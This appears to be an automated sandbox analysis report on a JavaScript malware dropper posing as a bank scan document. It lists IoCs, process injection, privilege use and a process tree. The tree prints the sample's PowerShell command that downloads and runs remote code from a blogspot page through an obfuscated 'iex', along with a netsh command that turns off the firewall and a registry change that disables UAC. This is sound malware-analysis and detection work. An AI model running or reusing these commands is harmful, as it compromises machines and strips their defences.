Analysis
-
max time kernel
137s -
max time network
156s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64 arch:x86 image:win10v2004-20231215-en locale:en-us os:windows10-2004-x64 system -
submitted
16-01-2024 10:39
Static task
static1
Behavioral task
behavioral1
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
New_ScanDoc#092387CHASEeAdvice.js
Resource
win10v2004-20231215-en
General
-
Target
New_ScanDoc#092387CHASEeAdvice.js
-
Size
1.4MB
-
MD5
286d534eb759c671fa9e79cfafd3bc85
-
SHA1
d165938c1c607618c5cb6d9d11cf5b371f007ac7
-
SHA256
77109ba56a5e70fafe88a10800764ec30d35727c1ff8cdb2934534ae8c7e048b
-
SHA512
3b1ee1a647b623265ad7e90d786e61cafe6ca5e312676dafcc198763cf8efe3f479fb66b4aae9d1e7289ec5433055ab193ffd91abefc732e3d337d4fe987119b
-
SSDEEP
192:FQzfvQzrHHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHH3HHHHHHnHHHHHHf:efYzD
Malware Config
Signatures
-
Processes: powershell.exe

| description | ioc | process |
| --- | --- | --- |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe |

-
Blocklisted process makes network request 2 IoCs
Processes: powershell.exe

| flow | pid | process |
| --- | --- | --- |
| 4 | 1076 | powershell.exe |
| 8 | 1076 | powershell.exe |

-
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes: wscript.exe

| description | ioc | process |
| --- | --- | --- |
| Key value queried | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation | wscript.exe |

-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes: powershell.exe

| description | ioc | process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | powershell.exe |

-
Adds Run key to start application 2 TTPs 1 IoCs
Processes: powershell.exe

| description | ioc | process |
| --- | --- | --- |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Deissl1 = "schtasks /run /tn Deissl1" | powershell.exe |

-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:

| flow | ioc |
| --- | --- |
| 46 | api.ipify.org |
| 47 | api.ipify.org |
| 50 | ip-api.com |

-
Suspicious use of SetThreadContext 3 IoCs
Processes: powershell.exe

| description | pid | process | target process |
| --- | --- | --- | --- |
| PID 1076 set thread context of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 set thread context of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 set thread context of 3872 | 1076 | powershell.exe | Msbuild.exe |

-
Drops file in Windows directory 1 IoCs
Processes: dw20.exe

| description | ioc | process |
| --- | --- | --- |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | dw20.exe |

-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes: dw20.exe, dw20.exe

| description | ioc | process |
| --- | --- | --- |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | dw20.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | dw20.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | dw20.exe |

-
Enumerates system info in registry 2 TTPs 4 IoCs
Processes: dw20.exe, dw20.exe

| description | ioc | process |
| --- | --- | --- |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | dw20.exe |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | dw20.exe |

-
Modifies registry class 3 IoCs
Processes: powershell.exe

| description | ioc | process |
| --- | --- | --- |
| Key created | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} | powershell.exe |
| Key created | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 | powershell.exe |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" | powershell.exe |

-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes: powershell.exe, RegSvcs.exe

| pid | process |
| --- | --- |
| 1076 | powershell.exe |
| 1076 | powershell.exe |
| 1076 | powershell.exe |
| 1076 | powershell.exe |
| 1076 | powershell.exe |
| 1076 | powershell.exe |
| 3624 | RegSvcs.exe |
| 3624 | RegSvcs.exe |

-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes: powershell.exe, dw20.exe, RegSvcs.exe, dw20.exe

| description | pid | process |
| --- | --- | --- |
| Token: SeDebugPrivilege | 1076 | powershell.exe |
| Token: SeRestorePrivilege | 2380 | dw20.exe |
| Token: SeBackupPrivilege | 2380 | dw20.exe |
| Token: SeBackupPrivilege | 2380 | dw20.exe |
| Token: SeBackupPrivilege | 2380 | dw20.exe |
| Token: SeBackupPrivilege | 2380 | dw20.exe |
| Token: SeDebugPrivilege | 3624 | RegSvcs.exe |
| Token: SeBackupPrivilege | 1520 | dw20.exe |
| Token: SeBackupPrivilege | 1520 | dw20.exe |
| Token: SeIncreaseQuotaPrivilege | 1076 | powershell.exe |
| Token: SeSecurityPrivilege | 1076 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 1076 | powershell.exe |
| Token: SeLoadDriverPrivilege | 1076 | powershell.exe |
| Token: SeSystemProfilePrivilege | 1076 | powershell.exe |
| Token: SeSystemtimePrivilege | 1076 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 1076 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 1076 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 1076 | powershell.exe |
| Token: SeBackupPrivilege | 1076 | powershell.exe |
| Token: SeRestorePrivilege | 1076 | powershell.exe |
| Token: SeShutdownPrivilege | 1076 | powershell.exe |
| Token: SeDebugPrivilege | 1076 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 1076 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 1076 | powershell.exe |
| Token: SeUndockPrivilege | 1076 | powershell.exe |
| Token: SeManageVolumePrivilege | 1076 | powershell.exe |
| Token: 33 | 1076 | powershell.exe |
| Token: 34 | 1076 | powershell.exe |
| Token: 35 | 1076 | powershell.exe |
| Token: 36 | 1076 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 1076 | powershell.exe |
| Token: SeSecurityPrivilege | 1076 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 1076 | powershell.exe |
| Token: SeLoadDriverPrivilege | 1076 | powershell.exe |
| Token: SeSystemProfilePrivilege | 1076 | powershell.exe |
| Token: SeSystemtimePrivilege | 1076 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 1076 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 1076 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 1076 | powershell.exe |
| Token: SeBackupPrivilege | 1076 | powershell.exe |
| Token: SeRestorePrivilege | 1076 | powershell.exe |
| Token: SeShutdownPrivilege | 1076 | powershell.exe |
| Token: SeDebugPrivilege | 1076 | powershell.exe |
| Token: SeSystemEnvironmentPrivilege | 1076 | powershell.exe |
| Token: SeRemoteShutdownPrivilege | 1076 | powershell.exe |
| Token: SeUndockPrivilege | 1076 | powershell.exe |
| Token: SeManageVolumePrivilege | 1076 | powershell.exe |
| Token: 33 | 1076 | powershell.exe |
| Token: 34 | 1076 | powershell.exe |
| Token: 35 | 1076 | powershell.exe |
| Token: 36 | 1076 | powershell.exe |
| Token: SeIncreaseQuotaPrivilege | 1076 | powershell.exe |
| Token: SeSecurityPrivilege | 1076 | powershell.exe |
| Token: SeTakeOwnershipPrivilege | 1076 | powershell.exe |
| Token: SeLoadDriverPrivilege | 1076 | powershell.exe |
| Token: SeSystemProfilePrivilege | 1076 | powershell.exe |
| Token: SeSystemtimePrivilege | 1076 | powershell.exe |
| Token: SeProfSingleProcessPrivilege | 1076 | powershell.exe |
| Token: SeIncBasePriorityPrivilege | 1076 | powershell.exe |
| Token: SeCreatePagefilePrivilege | 1076 | powershell.exe |
| Token: SeBackupPrivilege | 1076 | powershell.exe |
| Token: SeRestorePrivilege | 1076 | powershell.exe |
| Token: SeShutdownPrivilege | 1076 | powershell.exe |
| Token: SeDebugPrivilege | 1076 | powershell.exe |

-
Suspicious use of WriteProcessMemory 38 IoCs
Processes: wscript.exe, powershell.exe, csc.exe, RegSvcs.exe, Msbuild.exe

| description | pid | process | target process |
| --- | --- | --- | --- |
| PID 4620 wrote to memory of 1076 | 4620 | wscript.exe | powershell.exe |
| PID 4620 wrote to memory of 1076 | 4620 | wscript.exe | powershell.exe |
| PID 1076 wrote to memory of 1680 | 1076 | powershell.exe | csc.exe |
| PID 1076 wrote to memory of 1680 | 1076 | powershell.exe | csc.exe |
| PID 1680 wrote to memory of 2928 | 1680 | csc.exe | cvtres.exe |
| PID 1680 wrote to memory of 2928 | 1680 | csc.exe | cvtres.exe |
| PID 1076 wrote to memory of 3188 | 1076 | powershell.exe | netsh.exe |
| PID 1076 wrote to memory of 3188 | 1076 | powershell.exe | netsh.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 3624 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1076 wrote to memory of 1608 | 1076 | powershell.exe | RegSvcs.exe |
| PID 1608 wrote to memory of 2380 | 1608 | RegSvcs.exe | dw20.exe |
| PID 1608 wrote to memory of 2380 | 1608 | RegSvcs.exe | dw20.exe |
| PID 1608 wrote to memory of 2380 | 1608 | RegSvcs.exe | dw20.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 1076 wrote to memory of 3872 | 1076 | powershell.exe | Msbuild.exe |
| PID 3872 wrote to memory of 1520 | 3872 | Msbuild.exe | dw20.exe |
| PID 3872 wrote to memory of 1520 | 3872 | Msbuild.exe | dw20.exe |
| PID 3872 wrote to memory of 1520 | 3872 | Msbuild.exe | dw20.exe |
Processes
-
C:\Windows\system32\wscript.exe (depth 1)
wscript.exe C:\Users\Admin\AppData\Local\Temp\New_ScanDoc#092387CHASEeAdvice.js
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm simoubizw.blogspot.com///////////////////////////atom.xml) | . ('i*x').replace('*','e');Start-Sleep -Seconds 6
- UAC bypass
- Blocklisted process makes network request
- Registers COM server for autorun
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe (depth 3)
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.cmdline"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe (depth 4)
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDE98.tmp" "c:\Users\Admin\AppData\Local\Temp\dvab1sqt\CSC596A6479DCE643D5AB88413845D2E882.TMP"
-
C:\Windows\system32\netsh.exe (depth 3)
"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off -ErrorAction SilentlyContinue
- Modifies Windows Firewall
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (depth 3)
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe (depth 3)
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe (depth 4)
dw20.exe -x -s 784
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe (depth 3)
"C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe (depth 4)
dw20.exe -x -s 780
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
- Create or Modify System Process: 1
- Windows Service: 1
- Boot or Logon Autostart Execution: 2
- Registry Run Keys / Startup Folder: 2
Privilege Escalation
- Abuse Elevation Control Mechanism: 1
- Bypass User Account Control: 1
- Create or Modify System Process: 1
- Windows Service: 1
- Boot or Logon Autostart Execution: 2
- Registry Run Keys / Startup Folder: 2
Downloads
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER606C.tmp.xml (Filesize: 4KB)
- C:\Users\Admin\AppData\Local\Temp\RESDE98.tmp (Filesize: 1KB)
- C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5hz2ugr2.pm5.ps1 (Filesize: 60B)
- C:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.dll (Filesize: 3KB)
- \??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\CSC596A6479DCE643D5AB88413845D2E882.TMP (Filesize: 652B)
- \??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.0.cs (Filesize: 870B)
- \??\c:\Users\Admin\AppData\Local\Temp\dvab1sqt\dvab1sqt.cmdline (Filesize: 369B)